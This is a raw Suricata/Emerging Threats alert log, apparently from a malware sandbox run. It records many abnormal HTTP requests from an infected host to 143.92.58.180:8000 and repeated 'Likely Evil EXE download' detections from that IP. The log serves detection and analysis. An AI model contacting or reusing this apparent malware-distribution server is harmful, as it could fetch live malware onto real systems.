TCP 192.168.56.103:49554 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49622 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49721 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49310 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49556 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49623 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49733 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49521 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49561 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49522 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49628 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49564 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49745 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49528 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49633 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49565 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49326 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49749 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49637 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49567 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49757 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49537 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49642 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49767 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49648 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49778 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49579 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49650 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49785 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49591 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49651 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49791 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49594 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49654 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49799 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49538 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49661 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49606 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49664 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49805 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49539 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49667 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49329 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49677 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49331 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49634 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49685 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49546 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49690 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49635 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49334 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49694 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49338 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49702 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49552 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49340 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49636 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49708 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49352 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49354 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49711 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49643 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49558 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49360 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49365 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49570 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49649 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49730 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49376 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49377 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49576 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49653 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49739 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49381 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49744 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49385 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49659 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49751 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49398 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49411 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49660 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49412 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49756 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49417 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49759 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49665 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49420 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49590 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49810 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49763 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49811 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49765 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49812 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49668 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49597 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49769 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49770 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49421 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49598 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49771 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49679 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49423 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49600 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49436 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49706 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49439 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49440 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49613 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49790 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49712 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49442 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49794 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49798 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49616 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49806 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49467 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49621 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49473 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49747 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49481 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49748 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49490 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49750 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49491 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49752 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49807 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49773 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49499 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49818 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49787 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49502 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49819 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49795 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49503 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49803 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49508 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49813 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49510 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49516 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49814 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49542 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49627 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49543 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49639 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49550 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49644 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49646 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49824 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49575 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49826 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49655 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49578 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49582 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49656 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49584 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49658 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49669 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49673 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49611 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49676 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49620 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49700 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49632 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49701 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49647 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49705 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49657 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49707 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49662 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49709 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49663 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49715 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49670 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49723 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49726 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49674 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49675 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49746 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49681 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49691 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49764 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49695 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49697 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49775 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49698 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49780 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
